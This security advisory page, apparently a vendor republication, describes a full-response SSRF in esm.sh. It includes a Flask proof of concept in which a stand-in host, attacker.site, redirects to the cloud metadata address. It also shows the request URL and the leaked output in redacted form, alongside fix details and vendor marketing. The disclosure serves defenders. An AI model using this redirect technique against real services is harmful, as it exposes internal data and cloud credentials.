GHSA-3c9r-837r-qqm4
esm.sh is vulnerable to full-response SSRF
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
github.com/esm-dev/esm.shReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Summary
esh.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability.
Details
Vulnerable code location: https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/server/router.go#L511
If the internal address has a suffix listed below, the attacker can obtain content from the specified internal address.
eg: https://esm.sh/https://local.site/test.md
".js", ".ts", ".mjs", ".mts", ".jsx", ".tsx", ".cjs", ".cts", ".vue", ".svelte", ".md", ".css"
A 302 redirect can be used to bypass the suffix restriction.
eg: https://esm.sh/https://attacker.site/test.md
https://attacker.site/test.md 302 redirect to http://169.254.169.254/v1.json
PoC
Use Flask to start a server that returns a 302 redirect.
from flask import Flask, redirect
app = Flask(__name__)
@app.route('/test.md')
def redirect_test():
return redirect("http://169.254.169.254/v1.json", code=302)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
Let esh.sh visit this site.
https://esm.sh/https://attacker.site/test.md
Attacker can obtain data from http://169.254.169.254/v1.json.
var t=`<p>{"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"****","instance-v2-id":"****","instanceid":"****","interfaces":[{"ipv4":{"additional":[],"address":"****","gateway":"****","netmask":"****","routes":[{"netmask":32,"network":"****"}]},"ipv6":{"additional":[],"address":"****","network":"****","prefix":"64"},"mac":"****","network-type":"public"}],"nvidia-driver":[],"public-keys":["****"],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]}</p>
`,o={},u=t;export{u as default,t as html,o as meta};
Decode the data (redacted) .
{"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"****","instance-v2-id":"****","instanceid":"****","interfaces":[{"ipv4":{"additional":[],"address":"****","gateway":"****","netmask":"****","routes":[{"netmask":32,"network":"****"}]},"ipv6":{"additional":[],"address":"****","network":"****","prefix":"64"},"mac":"****","network-type":"public"}],"nvidia-driver":[],"public-keys":["****"],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]}
Impact
An attacker can exploit the vulnerability to access internal sites, and in a cloud environment, can retrieve access keys (AK) and secret keys (SK) by accessing the metadata service address.
Fix
It is recommended to use safeurl.Client as a replacement for http.Client.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/esm-dev/esm.sh | all versions | 0.0.0-20250616164159-0593516c4cfa |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/esm-dev/esm.sh. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/esm-dev/esm.sh to 0.0.0-20250616164159-0593516c4cfa or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-3c9r-837r-qqm4 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-3c9r-837r-qqm4 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-3c9r-837r-qqm4. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-3c9r-837r-qqm4 in your dependencies?
O3 detects GHSA-3c9r-837r-qqm4 across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.